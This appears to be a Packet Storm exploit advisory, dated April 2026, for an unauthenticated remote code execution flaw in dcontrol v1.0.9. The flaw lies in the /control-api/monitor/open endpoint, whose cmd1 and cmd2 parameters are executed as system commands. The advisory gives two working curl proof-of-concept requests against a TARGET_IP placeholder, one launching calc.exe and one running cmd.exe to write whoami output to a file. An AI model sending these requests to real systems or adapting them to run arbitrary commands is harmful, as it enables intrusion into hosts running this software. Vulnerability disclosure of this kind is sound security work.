Share
## https://sploitus.com/exploit?id=PACKETSTORM:219191
# Exploit Title: dcontrol v1.0.9 - Unauthenticated Remote Code Execution
    (RCE)
    # Date: 2026-04-18
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://github.com/dhjz/dcontrol
    # Software Link:
    https://github.com/dhjz/dcontrol/releases/download/1.0.9/dcontrol.exe
    # Version: 1.0.9
    # Tested on: Windows 10, Windows 11
    
    
    # Description:
    dcontrol v1.0.9 is vulnerable to unauthenticated Remote Code Execution (RCE)
    via the /control-api/monitor/open endpoint. The application takes
    user-supplied
    input from the 'cmd1' and 'cmd2' URL parameters and passes them directly to
    system command execution functions without any sanitization or validation.
    
    
    
    # Proof of Concept 1:
    
    Request:
    curl "http://TARGET_IP:666/control-api/monitor/open?cmd1=calc.exe"
    
    Response:
    {"code":200,"msg":"ๆ“ไฝœๆˆๅŠŸ","data":"calc.exe,"}
    
    
    Result: Calculator.exe launches on the target system's desktop
    
    # Proof of Concept 2:
    
    Request:
    curl "
    http://TARGET_IP:666/control-api/monitor/open?cmd1=cmd.exe&cmd2=/c%20whoami%20%3E%20C
    :\\Windows\\Temp\\whoami.txt"
    
    Response:
    {"code":200,"msg":"ๆ“ไฝœๆˆๅŠŸ","data":"cmd.exe,/c whoami \u003e
    C:\\Windows\\Temp\\whoami.txt"}
    
    Result: whoami.txt is in c:\windows\temp\